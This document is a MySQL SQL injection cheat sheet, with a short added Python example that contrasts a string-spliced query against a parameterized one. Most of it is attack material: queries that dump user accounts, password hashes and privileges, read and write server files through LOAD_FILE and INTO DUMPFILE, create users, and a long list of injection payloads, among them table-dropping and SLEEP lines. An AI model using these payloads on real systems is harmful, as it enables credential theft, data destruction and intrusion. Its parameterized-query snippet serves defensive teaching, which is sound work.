SQL Injection in MySQL
1' OR '1'='1
1 AND 1=1
If both return the same result, the input is not being filtered and the database is vulnerable.
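As an added illustration of the check above (not part of the original cheat sheet): a lookup that splices the value into the query text, beside the parameterized form that neutralises the same payload. The `users` table is constructed for the example, and SQLite's standard-library driver stands in for MySQL so it runs offline.

```python
import sqlite3

# Constructed sample data standing in for a MySQL `users` table. SQLite is
# used only so the example runs offline; the string splicing and the
# parameter binding behave the same way with MySQL connectors (which use
# %s as the placeholder instead of ?).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn

def lookup_vulnerable(conn, user_id):
    # Vulnerable: the untrusted value is spliced into the statement text, so
    # the closing quote in  1' OR '1'='1  ends the literal and the rest of
    # the payload becomes part of the WHERE clause.
    sql = ("SELECT username FROM users WHERE id = '" + user_id + "' "
           "ORDER BY id")
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, user_id):
    # Hardened: the value is bound as a parameter. The driver sends it as
    # data, so quotes inside it can never change the statement structure.
    sql = "SELECT username FROM users WHERE id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (user_id,))]

def probe(lookup):
    """Run the normal value and the tautology payload through `lookup` and
    return both result lists, so the two can be compared as in the check
    above."""
    conn = make_db()
    return lookup(conn, "1"), lookup(conn, "1' OR '1'='1")

if __name__ == "__main__":
    # Spliced query: the payload returns every row; bound query: no row,
    # because no id equals the literal string "1' OR '1'='1".
    print("vulnerable:", probe(lookup_vulnerable))
    print("safe:      ", probe(lookup_safe))
```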
Dumping SQL tables
1. Get SQL version
SELECT @@version
2. Get Current user
SELECT user();
SELECT system_user();
3. List all database users (not system users!)
SELECT user FROM mysql.user;
4. List password hashes for database users
SELECT host, user, password FROM mysql.user;
5. Dump all privileges in the databases
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- list user privs, one column per privilege
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns
6. Dump DBA accounts
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y';
7. View Current database
SELECT database();
8. View all databases
SELECT schema_name FROM information_schema.schemata;
9. View columns
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema';
10. View tables
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema';
11. Find a table by a column's name. For example, to find a table with a column called username:
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
12. Select by row number.
SELECT host, user FROM mysql.user ORDER BY host LIMIT 1 OFFSET 0;
SELECT host, user FROM mysql.user ORDER BY host LIMIT 1 OFFSET 1;
13. Read local file.
UNION ALL SELECT LOAD_FILE('file location')
14. Write to local file
SELECT * FROM mytable INTO DUMPFILE 'file location';
15. Get Hostname and IP address
SELECT @@hostname;
16. Create a new user
CREATE USER newuser IDENTIFIED BY 'pass1';
17. Delete existing user
DROP USER olduser;
18. Other Injections
'
"
/
/*
#
)
(
)'
('
and 1=1
and 1=2
and 1>2
and 1<=2
+and+1=1
+and+1=2
+and+1>2
+and+1<=2
/**/and/**/1=1
/**/and/**/1=2
/**/and/**/1>2
/**/and/**/1<=2
'or"='
' or'x'='x
"or"x"="x
')orx=x--
')or('x'='x
')or1=1--
0 or 1=1
'0 or 0=0--
" or 0=0--
or 0=0--
' or 0=0 #
" or 0=0 #
or 0=0#
'or 1='1
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
1' OR '1'='1
'='
' OR 1 = 1 -- -
' OR 1 -- -
1 EXEC SP_ (or EXEC XP_)
x';--
\'; DESC users; --
1\'1
1' AND non_existant_table = '1
1 AND non_existant_table = 1
' OR username IS NOT NULL OR username = '
1 UNI/**/ON SELECT ALL FROM WHERE
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 --
';DROP table sampletable;--
';SELECT SLEEP(200);--
UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'